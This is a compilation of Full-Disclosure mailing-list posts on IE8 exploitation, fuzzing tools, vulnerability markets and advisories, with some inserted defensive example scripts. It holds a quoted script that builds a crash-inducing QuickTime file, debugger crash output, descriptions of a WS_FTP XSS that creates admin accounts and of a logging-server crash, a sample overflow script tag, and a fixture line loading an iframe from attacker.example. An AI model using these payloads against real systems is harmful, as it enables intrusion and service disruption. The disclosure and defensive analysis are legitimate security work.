Re: [Full-disclosure] Exploiting memory corruption vulnerabilities on Internet Explorer 8
Freddie Vicious wrote:

Microsoft released Internet Explorer 8 on March 19, 2009, and up to now there's no reliable method to exploit memory corruption vulnerabilities on it? I mean, on IE6 and IE7 we had SkyLined's heap spray technique, first seen in the IFRAME overflow exploit [1], which has been used by almost every IE memory corruption exploit so far. Internet Explorer 8 was enhanced with DEP and ASLR protections, making heap spray useless. Then Mark Dowd and Alexander Sotirov published their great paper, Bypassing Browser Memory Protections [2], providing some excellent techniques, mainly the .NET binary technique which bypasses DEP and ASLR; it was used by Nils at the latest Pwn2Own to own Internet Explorer 8 RC (Release Candidate) [3] and was used to mass-exploit other vulnerabilities [4]. One day after Nils owned IE8 RC, Microsoft released Internet Explorer 8 RTM and blocked the option to load .NET DLLs from the Internet zone and Restricted sites zone. Due to the fact that most IE exploitation doesn't occur in the Intranet/Trusted sites/Local machine zone, this makes the .NET DLL technique irrelevant most of the time. So my question is: is there no reliable method to exploit memory corruption vulnerabilities in Internet Explorer 8?

I'm not aware of any catch-all technique just for IE8, though there are a few common ones like return oriented programming. Application specific techniques are also common when third party extensions are involved.

[1] http://milw0rm.com/exploits/612
[2] http://taossa.com/archive/bh08sotirovdowd.pdf
[3] http://dvlabs.tippingpoint.com/blog/2009/03/18/pwn2own-2009-day-1---safari-internet-explorer-and-firefox-taken-down-by-four-zero-day-exploits
[4] http://milw0rm.com/exploits/8969

--
Best wishes,
Freddie Vicious

--
Jared D. DeMott
Principal Security Researcher

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] HaXor and Developer training
Well, it's starting to get cold already this year up in Michigan... Thank goodness for ToorCon! I always look forward to warm San Diego in October. Every year I've been to the conference it seems to get better, and may I suggest you check out one of the awesome workshops too. :)

The complete line-up for the AppSec class can be found here: http://www.vdalabs.com/tools/2_day_AppSec_syllabus.pdf

Cheers,
Jared
Re: [Full-disclosure] WinAppDbg version 1.2 is out!
Mario Alejandro Vilas Jerez wrote:

What is WinAppDbg?
==

The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment.

Can you compare/contrast with pydbg so I can understand why I might want to give it a try? Do you have a fuzzing platform like Sulley for it as well?

Thx!
Jared

It uses ctypes to wrap many Win32 API calls related to debugging, and provides an object-oriented abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows. The intended audience are QA engineers and software security auditors wishing to test / fuzz Windows applications with quickly coded Python scripts. Several ready to use utilities are shipped and can be used for these purposes. Current features also include disassembling x86 native code (using the open source diStorm project, see http://ragestorm.net/distorm/), debugging multiple processes simultaneously and producing a detailed log of application crashes, useful for fuzzing and automated testing.

Where can I find WinAppDbg?
===

The WinAppDbg project is currently hosted at Sourceforge, and can be found at: http://winappdbg.sourceforge.net/

It's also hosted at the Python Package Index (PyPi): http://pypi.python.org/pypi/winappdbg/1.2
Re: [Full-disclosure] Apple QuickTime 0day
Excellent. Doesn't trigger on Mac. I just did a talk on QuickTime hacking at ShakaCon III -- which, by the way -- can I just say, best place for a con ever! My slides are at www.vdalabs.com. The slides might give you some insight into the types of exceptions you're hoping for. To boil it down, a tool like !exploitable is nice since it could be used to bin crashes into read exception or write exception (the type you're looking for). Oh, and by the way, you can't really call a crash an 0day. I called them 0day crashes in my talk, just to be clear.

Blessings,
Jared

webDEViL wrote:

Try it with your latest quicktime player.

--
#0:000> !exploitable -v
#HostMachine\HostUser
#Executing Processor Architecture is x86
#Debuggee is in User Mode
#Debuggee is a live user mode debugging session on the local machine
#Event Type: Exception
#Exception Faulting Address: 0x66830f9b
#First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC0FD)
#
#Faulting Instruction:66830f9b push ebx
#
#Basic Block:
#66830f9b push ebx
# Tainted Input Operands: ebx
#66830f9c push ebp
#66830f9d mov ebp,dword ptr unloaded_papi.dll+0x41f (0420)[esp]
#66830fa4 push esi
#66830fa5 push edi
#66830fa6 mov edi,ecx
#66830fa8 cmp edi,offset unloaded_papi.dll+0x5ff (0600)
#66830fae mov ebx,edx
#66830fb0 mov dword ptr [esp+14h],eax
#66830fb4 mov byte ptr [esp+10h],0
#66830fb9 mov byte ptr [esp+11h],0
#66830fbe mov byte ptr [esp+12h],0
#66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4)
#
#Exception Hash (Major/Minor): 0x614b6671.0x614b786e
#
#Stack Trace:
#QuickTime!DllMain+0x2fabb
#Unloaded_papi.dll+0x1231137
#Instruction Address: 0x66830f9b
#
#Description: Stack Overflow
#Short Description: StackOverflow
#Exploitability Classification: UNKNOWN
#Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e)

print "--"
print "w3bd3vil [at] gmail [dot] com"
print "Apple QuickTime CRGN Atom 0day"
print "--"

# Raw bytes of the crafted .mov: an ftyp atom, then a moov atom whose trak
# carries a clip atom containing a malformed crgn atom padded with 0xFF bytes.
bytes = [ 0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70, 0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67, 0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00, 0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00, 0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02, 0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B, 0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63, 0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00, 0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ]

# Write the bytes out as a QuickTime file (Python 2: "%c" % byte yields a one-byte str).
f = open("webDEViL.mov", "wb")
for byte in bytes:
    f.write("%c" % byte)
f.close()
print "webDEViL.mov created! (%d bytes)" % len(bytes)
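As an added example (not code from either poster), the following triage script parses !exploitable -v reports shaped like the one quoted above and bins crashes by the kind of faulting access, as the reply suggests. The first report reuses the field values shown in the post; the second is a constructed WriteAV report included only to exercise a different bucket.

```python
import re

# Constructed excerpts in the shape of !exploitable -v output. The first uses the
# field values from the post above; the second is made up to show another bucket.
REPORT_QUICKTIME = """\
#Exception Faulting Address: 0x66830f9b
#First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC0FD)
#Faulting Instruction:66830f9b push ebx
#Exception Hash (Major/Minor): 0x614b6671.0x614b786e
#Description: Stack Overflow
#Short Description: StackOverflow
#Exploitability Classification: UNKNOWN
"""

REPORT_CONSTRUCTED_WRITEAV = """\
#Exception Faulting Address: 0x41414141
#First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
#Exception Hash (Major/Minor): 0xdeadbeef.0xcafef00d
#Description: User Mode Write AV
#Short Description: WriteAV
#Exploitability Classification: EXPLOITABLE
"""

# "<field name>: <value>" lines, tolerating the leading '#' the quoted output
# carries and the missing space after "Faulting Instruction:".
FIELD_RE = re.compile(r"^\s*#?\s*([A-Za-z][A-Za-z ()/]+?):\s*(.+?)\s*$", re.M)


def parse_report(text):
    """Return the report's 'Name: value' fields as a dict."""
    return {name.strip(): value for name, value in FIELD_RE.findall(text)}


def bin_crash(fields):
    """Bucket a crash by the kind of faulting access, as the reply suggests:
    WriteAV -> 'write', ReadAV -> 'read', StackOverflow -> 'stack-exhaustion'."""
    short = fields.get("Short Description", "")
    if "Write" in short:
        return "write"
    if "Read" in short:
        return "read"
    if "StackOverflow" in short:
        return "stack-exhaustion"   # stack exhaustion, not memory corruption
    return "other"


def triage(reports):
    """Dedupe by the major exception hash and group crashes into buckets.
    Returns {bucket: [(major_hash, classification, faulting_address), ...]}."""
    seen = set()
    buckets = {}
    for text in reports:
        f = parse_report(text)
        major = f.get("Exception Hash (Major/Minor)", "?").split(".")[0]
        if major in seen:
            continue                # same crash site already recorded
        seen.add(major)
        entry = (major,
                 f.get("Exploitability Classification", "UNKNOWN"),
                 f.get("Exception Faulting Address", "?"))
        buckets.setdefault(bin_crash(f), []).append(entry)
    return buckets


if __name__ == "__main__":
    result = triage([REPORT_QUICKTIME, REPORT_CONSTRUCTED_WRITEAV, REPORT_QUICKTIME])
    for bucket, entries in result.items():
        print(bucket, entries)
```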
Re: [Full-disclosure] Whitepaper
Jeffrey Walton wrote:

Hi Jared,

Regarding 'The Digital Examination Process: Closing Gaps with New Technology', et al. From the page: This paper introduces new technology called Crucial Vision that addresses this widespread need. It seems to me that if Crucial Security wants to reach the widest audience with its revolutionary technology, the company would simply publish the paper(s) rather than try and mine the data with a 'Request Resource'.

You've got the wrong paper, mine is entitled: 'Introduction to Application Security'

Jeff

On 5/28/09, Jared DeMott jdem...@crucialsecurity.com wrote:

Hi all, If you plan to take my Application Security: For Hackers and Developers at ShakaCon, BlackHat, ToorCon, and others; I finally got off my can and finished the prerequisite white paper. It can be found here: http://www.crucialsecurity.com/index.php?option=com_content&task=view&id=94&Itemid=136

Blessings,
Jared

--
Jared D. DeMott
Senior Security Researcher
Crucial Security Business Area
Harris Corporation
http://crucialsecurity.com
Office 616.874.7810
Mobile 571.283.4163
[Full-disclosure] Whitepaper
Hi all,

If you plan to take my Application Security: For Hackers and Developers at ShakaCon, BlackHat, ToorCon, and others; I finally got off my can and finished the prerequisite white paper. It can be found here: http://www.crucialsecurity.com/index.php?option=com_content&task=view&id=94&Itemid=136

Blessings,
Jared
Re: [Full-disclosure] Bat signal.
Robin responding. Holy email list batman, it's a false alarm!
Re: [Full-disclosure] Penetration testing will be dead by 2009 - Mr. Chess
James Matthews wrote:

I wish! Fortify software has been tested against many open source projects and reported a bunch of false positives. Yes, I know they are working to improve the software. However, I still hold that fuzzing will show you some issues that this software cannot.

James

And if you're unsure if that's true ... just look to the Iron Chef fuzzing preso from this year's BlackHat ... fuzzing managed to find a better bug, though both approaches (static and dynamic) found a decent bug in the software under test.

Happy New Year!
Jared
Re: [Full-disclosure] Merry Christmas
KammyDoe wrote:

Merry Christmas, FD! It's been a fun year; here's to '09!

And may God bless you! :)
Re: [Full-disclosure] What Christianity means to me
Intelligence and religion shouldn't be in the same sentence. To even pretend, let alone believe, that some pathetic moron has an insight into the mindset of a celestial dictator is ridiculous. Religion may have been a foolish first attempt at science, but the fact that it still has a place in modern times where science explains so much shows how subservient people want to be.

I couldn't disagree more. Here's one small example of how I feel about such things: http://www.bridgewaycommunity.org/podcast/Sermon110908.mp3
Re: [Full-disclosure] die
James Matthews wrote:

Double Die

Gang, telling people to die is not nice. Please refer to [1] or [2].

[1] http://www.elliottsamazing.com/kindergarden.html
[2] http://en.wikipedia.org/wiki/Ethic_of_reciprocity
Re: [Full-disclosure] Kaminsky DNS bug leaked
Alexander Sotirov wrote:

Dino Dai Zovi finally spilled the beans: http://twitter.com/dinodaizovi/statuses/858981957

That's some funny crap.
Re: [Full-disclosure] bloginfosec.com: We're looking for a few good columnists!
Kurt Dillard wrote:

How much do you pay?

We were all wondering but didn't have the gall to ask! lol.
Re: [Full-disclosure] We've shut down the Exploit Acquisition Program
Simon Smith wrote:

If you're interested you can read about it here: http://snosoft.blogspot.com/2008/03/exploit-acquisition-program-shut-down.html

Ya, I'll second that one. The market turned out to be uglier than expected for a lot of reasons, including this one.

Jared
[Full-disclosure] Hackers are having a positive influence on the world
http://www.hackersforcharity.org/

Join the fun!
Jared
Re: [Full-disclosure] in Memory of Dude VanWinkle / Justin Plazzo
We all work so hard, and when we die - we have nothing to take with us. None of the praises are going to help Justin or his family now. He is missed and missed forever! I fear eternal life now. Reminds me of 911 in a way. People get so caught up in this Matrix like life ... we forget about what's real and what's just bus-i-ness. If Dude were here now, what advice do you think he'd give now (after discovering eternal truths)?

Jared
[Full-disclosure] Ipswitch FTP XSS leads to FTP server compromise
VDA Labs Advisory:
--
Ipswitch FTP XSS leads to FTP server compromise. The vendor has been notified and given the PoC.

Synopsis:

There is an XSS vulnerability in how the WS_FTP server logs client FTP commands. All user commands are logged. When the FTP command is invalid (an error), special characters are converted to HTML entities (< becomes &lt;, > becomes &gt;) before logging. However, when the FTP command is valid, there is no such sanity check, so it is possible to inject HTML and JavaScript into the log file. The WS_FTP administration interface (an IIS web application written in ASP) has a view-log option. When the logs are viewed, it is possible to steal the administrator's cookie, or even better, DIRECTLY create a new user (or admin) account on the FTP server. We've created a little PoC that creates a new system administrator account when the admin views the logs. The PoC is simple and injects an iframe that leads to another HTML file that creates the new account.

Discovered by:
--
John Harwold, VDA Labs, LLC
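As an added illustration (not VDA Labs' PoC or Ipswitch's code), the following models the escaping gap the advisory describes, shows the hardened logger and an output-encoding log viewer, and runs a simple markup detector over constructed log lines. The command set and log format are assumptions for the example.

```python
import html
import re

# Constructed FTP command log lines in the spirit of the advisory (not real WS_FTP output).
SAMPLE_LOG = [
    "10.0.0.5 USER alice",
    "10.0.0.5 CWD <iframe src=\"http://attacker.example/new-admin.html\"></iframe>",
    "10.0.0.5 FOO <b>bogus</b>",
]

# Assumed subset of FTP verbs the server treats as valid.
VALID_COMMANDS = {"USER", "PASS", "CWD", "PWD", "LIST", "RETR", "STOR", "QUIT"}


def log_entry_as_described(client, cmd):
    """Model of the behaviour the advisory describes: only the error path
    (invalid command) converts < and > to &lt; and &gt; before logging."""
    verb = cmd.split(" ", 1)[0].upper()
    if verb in VALID_COMMANDS:
        return "%s %s" % (client, cmd)          # logged verbatim: the injection point
    return "%s %s" % (client, html.escape(cmd, quote=False))


def log_entry_hardened(client, cmd):
    """Escape on every path, not just the error path."""
    return "%s %s" % (client, html.escape(cmd, quote=True))


def render_log_html(lines):
    """Viewer side: treat every stored line as untrusted text and escape it at
    output time, so the page is safe even when an older, unescaped log is loaded."""
    body = "\n".join(html.escape(line, quote=True) for line in lines)
    return "<pre>\n" + body + "\n</pre>"


# Detection: markup or script that should never appear in a client's command text.
MARKUP_RE = re.compile(
    r"<\s*/?\s*(script|iframe|img|object|embed|svg|body|a)\b|javascript:|\bon\w+\s*=",
    re.I)


def find_injected_markup(lines):
    """Return (line_number, line) for log entries that carry HTML/JS."""
    return [(n, line) for n, line in enumerate(lines, 1) if MARKUP_RE.search(line)]


if __name__ == "__main__":
    for n, line in find_injected_markup(SAMPLE_LOG):
        print("line %d looks injected: %s" % (n, line))
    print(render_log_html(SAMPLE_LOG))
```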
Re: [Full-disclosure] [Security Advisory] Backdoor Discovered in Immunity Debugger
Dave, is any of this true?
[Full-disclosure] Right, or wrong?
All:

So, I've tried the vendor pay model for bug hunting and it wasn't always well received. Apparently auction sites and 3rd party purchasers are fine, but some folks don't like the idea of selling directly to the vendor. I was thinking that this would be ideal since the vendor would have the most interest in knowing about/fixing the bug. My question to the list is this: Is it morally right, wrong, don't know, don't care, good business, bad business, etc.? Either way we're moving away from that model, but I was just curious how others on FD see it.

Blessings,
Jared
[Full-disclosure] LinkedIn 0day
For the full advisory and PoC, see: http://www.vdalabs.com/tools/linkedin.html

Jared
Re: [Full-disclosure] Help with education
Михал Потапыч wrote:

If these are the kind of questions you ask then perhaps you should reconsider your decision.

don't listen bro, there will always be naysayers when you're dreaming big. like i said offline, go for it!

jared
[Full-disclosure] IPSwitch WS_FTP Logging Server Remote Denial of Service -- a VDA Labs, LLC discovery
IPSwitch WS_FTP Logging Server Remote Denial of Service
Version: 7.5.29.0 (Logsrv.exe)

Overview

The WS_FTP logging server is a daemon that listens on UDP port 5151. It is shipped with WS_FTP, is turned on by default, and is used by the local WS_FTP instance. It binds to the public IP address of the server and is accessible externally, in part so that other WS_FTP machines are able to use it as a logging interface.

Description of Crash

WS_FTP uses a binary protocol to speak to the logging daemon, and each transmission begins with the two byte header 0xab 0xaa. If a long string of characters is used to mangle the remaining portion of the message, a pointer operation fails at:

0x00401769 cmp word ptr [ecx], 0AAADh
           jnz short loc_401787

This crashes the process. By flipping the two bytes immediately after the two primary header bytes, you are also able to control where the dereferenced address is at the time of the crash. However, this does not appear to allow code execution on the remote host, as the address referenced is too far away from any user supplied input.

Discovered By

Justin Seitz of VDA Labs LLC ([EMAIL PROTECTED])

Full advisory and attack code location:
http://www.vdalabs.com/resources
http://www.vdalabs.com/tools/ipswitch.html

ipswitchlogsrv-killer.py - Change the IP and PORT numbers as necessary at the top of the file. There are two bytes that lead to different address offsets where the pointer dereference is attempted.
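As an added, defender-side example (not VDA Labs' script), here is a small triage filter for UDP traffic to the logging daemon: it keys on the two-byte 0xab 0xaa header and the port from the advisory and flags oversized messages of the shape described, counting verdicts per source. The traffic records are constructed, and MAX_SANE_LEN is an assumed threshold, since the advisory does not document the protocol beyond its header.

```python
from collections import Counter

MAGIC = b"\xab\xaa"      # header every log-server message begins with (from the advisory)
LOGSRV_PORT = 5151       # UDP port the logging daemon listens on (from the advisory)
MAX_SANE_LEN = 512       # assumed upper bound on a legitimate message; tune from real traffic

# Constructed traffic records: (src_ip, dst_port, payload). Not captured data.
SAMPLE_TRAFFIC = [
    ("192.0.2.10", 5151, MAGIC + b"\x00\x01" + b"normal log line".ljust(40, b"\x00")),
    ("192.0.2.10", 53, b"\xab\xaa" + b"A" * 2000),               # other port: not the log server
    ("198.51.100.7", 5151, b"\x00\x00" + b"A" * 2000),           # no magic: the daemon should drop it
    ("198.51.100.7", 5151, MAGIC + b"\x41\x41" + b"A" * 2000),   # long string after the header
]


def classify_datagram(dst_port, payload):
    """Return 'ignore', 'malformed', 'ok' or 'oversized' for one datagram."""
    if dst_port != LOGSRV_PORT:
        return "ignore"
    if len(payload) < 2 or payload[:2] != MAGIC:
        return "malformed"      # fails the daemon's own header check
    if len(payload) > MAX_SANE_LEN:
        return "oversized"      # the shape of the crash trigger described above
    return "ok"


def triage_traffic(records):
    """Count verdicts per source and build alerts for oversized messages.
    Returns ({src: Counter}, [alert strings])."""
    per_src = {}
    alerts = []
    for src, dst_port, payload in records:
        verdict = classify_datagram(dst_port, payload)
        per_src.setdefault(src, Counter())[verdict] += 1
        if verdict == "oversized":
            # The two bytes after the header are the ones the advisory says steer the
            # faulting address; record them for the analyst without acting on them.
            alerts.append("%s sent %d-byte WS_FTP log-server message (bytes after header: %s)"
                          % (src, len(payload), payload[2:4].hex()))
    return per_src, alerts


if __name__ == "__main__":
    counts, alerts = triage_traffic(SAMPLE_TRAFFIC)
    for src, c in counts.items():
        print(src, dict(c))
    for a in alerts:
        print("ALERT:", a)
```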
[Full-disclosure] Updated versions of EFS and GPF
Are available here: http://www.vdalabs.com/resources

Thanks,
Jared
Re: [Full-disclosure] Month of Random Hashes: DAY SIXTEEN
Month of Random Hashes wrote:

[ITEM #1]
md5: 27cd1bb8a6b93c061fb0ad38031ca33d
sha1: 41b1f79e2f5a53ff182d03ca3fc00644a1173e4c
sha256: 0fba5450776398db658ca16d9b45e20e218d3f514d800586bf6778bcbb3d3088

Do I need to send out another hash of my ash to make this nonsense stop?
Re: [Full-disclosure] Month of Random Hashes: DAY SIXTEEN
Month of Random Hashes wrote:

FAQ coming soon. Please be patient.

ok, just having a little fun. Go ahead.
Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN
Month of Random Hashes wrote:

[ITEM #1]
==
my hinney
sha1: a25d7360e1294a6a6242ed4621d5d73347ea6398

Took a picture of my backend and would like to post the hash.
Re: [Full-disclosure] Month of Random Hashes: DAY FOURTEEN
Dr. Neal Krawetz PhD wrote:

Send it over here. The picture, not the hash. I have the technologies to determine whether the image is computer generated, digitally altered, or legitimately a real picture! These technologies shall be unveiled at Blackhat during my presentation. Sometimes it is difficult to determine which asses are real in this facade that is the computer security world.

- doc neal
http://www.hackerfactor.com/blog/

ps: if time provides during my speech, I will discuss the many difficulties I have experienced as a computer security consultant while attempting to have fake myspace accounts shut down for my clients!

hahahahahahha. believe me, no one really wants to see it!
Re: [Full-disclosure] Office 0day
Kradorex Xeron wrote:

On Sunday 24 June 2007 16:19, [EMAIL PROTECTED] wrote:

I can't give detail here

Isn't this list called full-disclosure? - in other words: If you aren't going to disclose anything: DON'T post that you have something. This list is designed specifically for disclosing (and discussing on occasion) vulnerabilities, problems, etc. to the entire community at once, not just selectively who you choose (i.e. who buys your 0day).

Finding good buyers is tricky. There is a market for bug selling, but you've got to be well connected.

Jared :)
Re: [Full-disclosure] Office 0day
secure poon wrote:

Proposition

Microsoft is a 280+ billion dollar corporation. Why don't/can't they have a standard ransom fee for security flaws?

0day Remote OS flaw: $1,000,000
0day IE explorer flaws that give administrative shells: $200,000
0day (other flaws) that affect other products (ie office): $200,000
etc.. (these fees could be much higher)

Provided the person who discovered the vulnerability gives a full working patch, then Microsoft could patch the hole right away and people could update. (yes I know lots of people don't update but at least it is a start, and then legally they would be so liable). Maybe this concept isn't new and I am just in the dark about it.

Question

Why doesn't Microsoft (or any company) do this? And also has Microsoft ever been held criminally liable for negligence in a criminal case for not patching a flaw leading to a security breach? Or is their team of lawyers just too much for any normal person?

All I can say is AMEN. Having to sell to TPs, iDefs, and Nation States is so much more painful.

Jared :)
Re: [Full-disclosure] Windows Oday release
What is funny however, is that Microsoft, the great supporter of responsible disclosure, actually is the main sponsor (patron) of the SyScan conference: http://syscan.org/ which is organized by Thomas. Maybe it's a sign that Microsoft realized that the free responsible disclosure idea is a bit artificial? (at last!)

No doubt. Security research is an establishing market. If vendors won't pay to know about their bugs others certainly will.

Jared :)
Re: [Full-disclosure] CSIS Advisory: BlueCoat K9 Web Protection 3.2.36 Overflow
Dennis Rand wrote:

CSIS Security Group has discovered a remote exploitable arbitrary overwrite, in the Blue Coat K9 Web Protection local Web configuration manager on 127.0.0.1 and port 2372.

Justin Seitz of VDA Labs (www.vdalabs.com) already found this bug. Here's the CVE: CVE-2007-1783. They had so many bugs, they're rolling this issue and more into the next release. We have a working PoC, and believe it could be transformed into remote via an embedded link. For example: <SCRIPT SRC=http://127.0.0.1:2372/<buffer here>></SCRIPT>, e.g. <SCRIPT SRC=http://127.0.0.1:2372/AAA></SCRIPT>

Blessings,
Jared
Re: [Full-disclosure] CSIS Advisory: BlueCoat K9 Web Protection 3.2.36 Overflow
Dennis Rand wrote:

Hey Jared

It does not matter when what was discovered as long as it got fixed :)

It does if you're in the bug reselling business.
[Full-disclosure] About the Post: Exciting new Paimei release!
This message concerns the below post. In case it isn't obvious, this isn't the real Pedram. We're not sure who or why.

Blessings,
Jared

I am excited to see Jared DeMott's recent post to Dailydave with his release of the Evolutionary Fuzzing System! A highly exciting and revolutionary (or is it EVOLUTIONARY!?) new fuzzing system designed for automatic discovery of protocols. A much exciting concept that I will have to write about in my new book!

Also included in this release is code previously only private to my copy of Paimei! Previously, all remote debugging functionality was reserved for my private copy but apparently Jared DeMott felt the time was right to include pydbg_client class in his EFS release of Paimei! This should allow debuggers of applications to use the remote functionality of Paimei to debug processes running on remote computers. Also the all new pydbg_server, just in this release! These tools should help all of you most greatly.

I highly recommend that instead of downloading the latest release of Paimei from openrce.org, you download the efs-paimei package from appliedsec.com, as their package has been updated far in advance of mine.

Happy fuzzing, and let the best boundary character overflow!

Pedram L. AminiAAA

But I return to my previous stack frame from there!

NOT TONIGHT YOU DON'T
Re: [Full-disclosure] [fuzzing] Fuzzled - Perl fuzzing framework
Tim Brown wrote:

Having noticed the popularity of fuzzing tools recently, I was feeling a bit left out. Where is the Perl framework to complete the family? With that in mind I've spent the last months working on something that should fill the gap - Fuzzled. Fuzzled is a powerful fuzzing framework. Fuzzled includes helper functions, namespaces, factories which allow a wide variety of fuzzing tools to be developed. Fuzzled comes with several example protocols and drivers for them. Fuzzled v1.0 can be found at http://www.portcullis-security.com/16.php.

Cheers,
Tim

Cool. :) Oh, GPF 4.1 will be up on the ASI website on Monday or Tuesday. No real enhancements, but code was reordered to support further development, and a few minor bug fixes were made.

Jared